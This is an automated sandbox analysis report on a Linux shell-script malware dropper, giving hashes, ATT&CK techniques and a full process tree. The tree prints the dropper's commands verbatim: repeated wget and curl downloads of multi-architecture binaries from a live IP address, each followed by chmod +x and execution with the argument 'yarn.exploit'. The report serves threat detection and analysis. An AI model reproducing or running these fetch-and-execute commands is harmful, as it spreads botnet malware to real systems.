0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b

Analysis

max time kernel
16s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-10-2024 01:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
Size

4KB
MD5

b294eb82d74dfef6c5bde2a967f84575
SHA1

382e337d7c0883288a5079d5eadf967e6c0c8934
SHA256

0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b
SHA512

8e55d076ec7cc6227605b5bdd45f024a2447858359dd9a3e1d3822ba131c6d896ed82f0331cb2be586a974a6ce260656826768b209cfd87d3235ee9f2831d826
SSDEEP

48:vXzWzMV4klXz5z1V4RXzrAzrWV4cXzizoV4aXzEezEEV4EeXz+zkV4+Xz5z1V4Rh:vH73WpPrDoFEpe5NjaTEVf3lT0zAbq

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1504	chmod
1509	chmod
1519	chmod
1524	chmod
1529	chmod
1534	chmod
1539	chmod
1499	chmod
1544	chmod
1549	chmod
1554	chmod
1559	chmod
1514	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/76d32be0	1500	76d32be0
/tmp/76d32be0	1505	76d32be0
/tmp/76d32be0	1510	76d32be0
/tmp/76d32be0	1515	76d32be0
/tmp/76d32be0	1520	76d32be0
/tmp/76d32be0	1525	76d32be0
/tmp/76d32be0	1530	76d32be0
/tmp/76d32be0	1535	76d32be0
/tmp/76d32be0	1540	76d32be0
/tmp/76d32be0	1545	76d32be0
/tmp/76d32be0	1550	76d32be0
/tmp/76d32be0	1555	76d32be0
/tmp/76d32be0	1560	76d32be0

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1501	wget
1502	curl
1503	cat

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.spc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.i686	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arc	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/76d32be0	0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6	curl

/tmp/0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
/tmp/0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh
1⤵
- Writes file to tmp directory
PID:1492
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:1493
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:1497
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:1498
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1499
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1500
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:1501
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1502
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:1503
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1504
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1505
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:1506
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  PID:1508
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1509
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1510
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:1511
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm
  2⤵
  PID:1513
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1515
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  PID:1516
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm5
  2⤵
  PID:1518
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1520
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  PID:1521
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm6
  2⤵
  PID:1523
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1525
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  PID:1526
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  - Writes file to tmp directory
  PID:1527
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arm7
  2⤵
  PID:1528
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1530
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  PID:1531
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.ppc
  2⤵
  PID:1533
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1535
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  PID:1536
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.m68k
  2⤵
  PID:1538
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1540
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  PID:1541
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.spc
  2⤵
  PID:1543
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1545
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  PID:1546
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.i686
  2⤵
  PID:1548
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1550
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  PID:1551
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.sh4
  2⤵
  PID:1553
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1555
- /usr/bin/wget
  wget http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  PID:1556
- /usr/bin/curl
  curl -O http://103.238.235.110/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  - Writes file to tmp directory
  PID:1557
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.arc
  2⤵
  PID:1558
- /bin/chmod
  chmod +x 0a7618391976452aa381a1bb32dd5e165f6eec2e45f9c9bd1a4a1f1e48a69a0b.sh 76d32be0 config-err-4Wxxtz db0fa4b8db0333367e9bda3ab68b8042.arc db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 netplan_9nr5x9m8 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-yOcbp3
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/76d32be0
  ./76d32be0 yarn.exploit
  2⤵
  - Executes dropped EXE
  PID:1560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
153B

MD5
932da5a430ff6db1bc48425b567d56fa

SHA1
e7e88023dbbc6346d354ffe9fb7db957888c2299

SHA256
10174434dbe479c08b32ce3b42b70e7c6336647d29e4393483158d590d35c325

SHA512
f30ad93d17d8ceb3ec2727a08a6ce7fc59da51a66ba7aeb2ab93efc84af4e16ea442769f9a5be140287e24d3e431218b0fec1e52e78ea70e5f8607b6569108e4

Download Submit